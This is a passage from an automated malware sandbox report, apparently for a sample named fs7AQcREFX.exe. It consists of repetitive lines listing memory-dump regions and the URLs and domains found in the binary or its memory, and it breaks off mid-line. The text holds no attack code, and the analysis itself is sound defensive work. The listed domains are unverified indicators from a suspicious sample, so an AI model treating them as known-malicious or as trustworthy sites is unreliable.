00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10653_hflip.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                      Source: fs7AQcREFX.exe, 00000000.00000003.391362964.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/
                      Source: fs7AQcREFX.exe, 00000000.00000003.391362964.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/-
                      Source: fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/m
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/x
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/B
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/m
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/m
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/uk
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/M
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/Q
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/f
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/p
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/E
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/H
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/sK
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.522264037.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg1.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 